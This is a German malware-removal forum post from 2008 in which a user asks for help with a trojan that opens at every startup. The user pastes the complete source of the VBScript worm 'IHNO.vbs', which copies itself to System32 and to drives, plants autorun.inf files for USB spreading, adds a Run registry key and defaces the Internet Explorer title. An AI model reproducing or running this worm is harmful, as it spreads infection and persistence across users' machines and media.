| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Bei jedem Hochfahren öffnet sich ein Trojaner-Fenster!?Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
19.06.2008, 10:41
| #1 |
 |  Bei jedem Hochfahren öffnet sich ein Trojaner-Fenster!? Hallo! Ich scheine mir einen Trojaner eingefangen zu haben..  Ich kann die Festplattenpartitionen nicht mehr via Doppelklick öffnen und immer wenn ich meinen Laptop hochfahre, öffnet sich ein Editor-Fenster mit folgendem Text: 'Mutation of Trojan virus. 'My name is IHNO.vbs On error resume next Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname Set fs = createobject("Scripting.FileSystemObject") Set wn = WScript.CreateObject("WScript.Network") Set mf = fs.getfile(Wscript.ScriptFullname) oldname=CStr(fs.getfilename(Wscript.ScriptFullname)) newname = wn.ComputerName & ".vbs" rgname = Replace(newname,".vbs","") atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe IHNO.vbs" dim text,size size = mf.size check = mf.drive.drivetype Set text=mf.openastextstream(1,-2) do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf Loop mysource=Replace(mysource,oldname,newname) do Set winpath = fs.getspecialfolder(0) Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname) tf.attributes = 32 Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true) tf.write mysource tf.close Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname) tf.attributes = 39 For each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then Set tf=fs.getfile(flashdrive.path &"\IHNO.vbs") tf.attributes =32 Set tf=fs.createtextfile(flashdrive.path &"\IHNO.vbs",2,true) tf.write mysource tf.close Set tf=fs.getfile(flashdrive.path &"\IHNO.vbs") tf.attributes =39 Set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes = 32 Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true) tf.write atr tf.close Set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes=39 End If next Set rg = createobject("WScript.Shell") rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","") if check <> 1 then Wscript.sleep 120000 End if loop while check<>1 Set sd = createobject("Wscript.shell") sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname Achja, IHNO heißt mein Pc..! Ich kenne mich in diesen Bereichen leider nicht sonderlich aus, aber kann ich das Ding irgendwie loswerden? Danke! |
| Themen zu Bei jedem Hochfahren öffnet sich ein Trojaner-Fenster!? |
| autorun, autorun.inf, check, error, explorer, explorer.exe, festplatte, folge, gen, hacked, hacked by, internet, internet explorer, laptop, loswerden, microsoft, nicht mehr, not, software, stream, system32, trojaner, trojaner eingefangen, windows, wscript.exe, öffnen, öffnet |
Baum-Darstellung